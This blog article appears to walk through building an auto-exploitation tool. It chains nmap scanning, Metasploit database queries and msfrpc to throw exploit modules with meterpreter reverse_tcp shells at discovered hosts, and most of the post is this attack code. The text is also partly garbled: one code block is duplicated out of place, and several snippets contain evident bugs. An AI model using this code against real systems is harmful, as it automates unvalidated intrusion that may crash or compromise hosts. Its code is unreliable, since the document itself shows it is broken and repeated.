MandaloreQuest: An Offensive Journey

MandaloreQuest: An Offensive Journey

by David Evenden


What is MandaloreQuest?

My research on the topic of the AutoExploitation of targets initiated the development of MandaloreQuest, an auto-exploitation tool that is designed to throw exploits mapped to targets. This is designed to operate much in the same way Browser_AutoPwn works in Metasploit. I wanted to see if I could develop something that throws exploits at known targets identified from an NMAP scan.

Python-NMAP

I started with identifying targets by using Python's built in NMAP module. In the resulting Python program I used getopt to receive targets and ports, then sent them to nmap. Here I'm not using getopt, but I wanted to let you know so there was some clarity around how I was handling user input.


#using 3 spaces instead of /t
import nmap
nm = nmap.PortScanner()
#if a port is provifded
nm.scan(TARGET, PORT, arguments='-n -O -Pn')
print nm.command_line() #for education purposes
#if a port is not provided
nm.scan(TARGET, arguments='-n -O -Pn')
allhosts = nm.all_hosts()
protocols = nm.all_protocols() #not actually helpful

#Then I rotated through the hosts with a for loop.
for i in allhosts:
   print nm[i].hostname()
   print nm[i].state()
   print nm[i].['tcp'].keys() #helpful gets all TCP open ports


   #in order to get OS data you must process the osmatch data
   osfamily = nm[i]['osmatch'][0]['osclass'][0]['osfamily']
   osgen = nm[i]['osmatch'][0]['osclass'][0]['osgen']
   target_os = '%s %s' % (osfamily, osgen)

   #alt option
   #some module target options might use the long name
   target_os = nm[i]['osmatch'][0]['name']

Before we move on I have to show you how to capture each protocol.


#first we add two additional for loops through each host
protocols = []
#need to check length and that it's not a list or this breaks
if len(nm[i][p]) >= 3 and not isinstance(nm[i][p], list):
   for p in nm[i]:
      if 'ipv4' in nm[i][p]:
         ipaddr = nm[i][p]['ipv4']
      for t in nm[i][p]:
         protocol = nm[i][p][t]['name']
         protocols.append(protocol)

Metasploit

Once the OS data and the protocol/port data has been obtained we can then move into interacting with metasploit. There are two parts here, the first is getting a list of exploits that might work against our target. So far my solution is sludgy and I don't have confidence that the exploits found will work very often. It appears that either Metaploit Dev Folk are trying to make it hard to link these, or there are other factors preventing a more transparent link analysis of exploit to target relationships. Let's pursue this first one before we move on to the next.


import psycopg2, psycopg2.extras
psql_connect = "host='localhost' dbname='msf' user='msf' password='%pass%'"
msf_conn = psycopg2.connect(psql_connect)
msf_cursor = msf_conn.connect(cursor_factory=psycopg2.extras.DictCursor)

Before we move on I have to show you how to capture each protocol.


#first we add two additional for loops through each host
protocols = []
#need to check length and that it's not a list or this breaks
if len(nm[i][p]) >= 3 and not isinstance(nm[i][p], list):
   for p in nm[i]:
      if 'ipv4' in nm[i][p]:
         ipaddr = nm[i][p]['ipv4']
      for t in nm[i][p]:
         protocol = nm[i][p][t]['name']
         protocols.append(protocol)

If you're using Kali your msfdb pass can be found here:


/usr/share/metasploit-framework/config/database.yml

If you're not using Kali...check your config folder in your metasploit install path.

Target/Module Link Analysis

Once you have the connection established you can now run queries and collect potential operational exploits. First I set my query. This is a compound query that took a lot of DB searching to identify the links between the tables and the IDs.

Here's a few screenshots of the details of the tables. You can see the id and details_id are designed to match up.

module_details

module_targets

Links against "windows xp"

Now we go on to use the OS data from before to identify exploits that could potentially work against our targets.



#remember this goes under the previous code and is performed for each protocol for each host
exploits = []
q = '%'
query = "select module_details.fullname, module_details.id, module_targets.detail_id, module_targets.name from module_details, module_targets where module_details.id=module_targets.details_id and module_targets.name ~ '%s^%s%s'" % (q, target_os, q)
msf_cursor.execute(query)
msf_details = msf_cursor.fetchall()
for row in msf_details:
   exploit = row['fullname']
   for protocol in protocols:
      if protocol in exploit:
         if not fullname in exploits:
            exloits.append(fullname)

After we capture the exploits for that OS and Protocol we can start launching exploits at targets. Of course here we are not diving into software and OS versions. Of course we understand this make this tool very dangerous and stupid. So we aren't releasing it to the public until we can make better determinations on software to exploit pairing. Our plan here is to use the db connect options for Nessus and see if that works. Nessus of course being a very dangerous tool if not used properly.

Moving forward the initial difficulty here is learning how to launch exploits and receive callbacks without initiating the program from a msfconsole.

MSFRPC: Metasploit's API

Luckily for my use case there is an underlying API for Metasploit that allows users to interact remotely with a running MSF Console. Here you basically launch your own remote msfconsole with parameters that allow for remote connectivity. We used the MSFRPC module. We have to make a few changes to get it to work inside our code. You can find the msfrpc.py code here:

https://github.com/SpiderLabs/msfrpc

Once you have this imported you can start a shell, and set the stage for your msfconsole platform to run jobs and start listeners.


import subprocess, time, msgpack
subprocess.call(['gnome-terminal', '-x', 'msfconsole', '-x', "load msprcp ServerHost=0.0.0.0 ServerPort=55000 User=MSF Pass='[email protected]'"])
time.sleep(15) #give the gui shell time to open
client = Msfrpc({})
client.login('msf', '[email protected]')
ConsoleDB = client.call('console.create')
console_id = ConsoleDB['id']

Once we've set the msfconsole stage, now we'll begin to run jobs and start listeners.


myip = socket.gethostbyname(socket.gethostname())
local_port = 8000
for exploit in exploits:   
   command = """   
   use %s   
   set payload %s/meterpreter/reverse_tcp   
   set rhost %s   
   set lhost %s
   set lport %s
   set autorunscript multi_console_command -rc /surveyscripts/%s/survey.rc
   run -j
   """ % (exploit, osfamily, ipaddr, myip, local_port, osfamily)
   client.call('console.write', [console_id.commands])
   local_port += 1

And now we've starting throwing exploits that might crash a system because there's no validation around the OS version or the software version. We'll keep working on that, and if you have some ideas, let us know.

Hope you've enjoyed the journey.

-JM (@JediMammoth)


About the author

David Evenden is an experienced offensive security operator/analyst with 10 years of active work experience inside the Intelligence Community (IC). During his time inside the IC, he learned Persian Farsi, worked at NSA Red Team and was a member of an elite international team operating in conjunction with coalition forces to aid in the ongoing efforts in the Middle East.

While he currently works with an ISP and DHS to aid in the efforts to enhance the bidirectional sharing relationship between the US Government and Commercial entities, his passion is educating network administrators and security engineers on best practices when securing your network.

David currently holds Pentest+ and CySA certificates.


The article was originally published on author's LinkedIn profile: https://www.linkedin.com/pulse/mandalorequest-offensive-journey-david-evenden/


 


                     
May 10, 2019

Leave a Reply

avatar

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
Notify of

© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013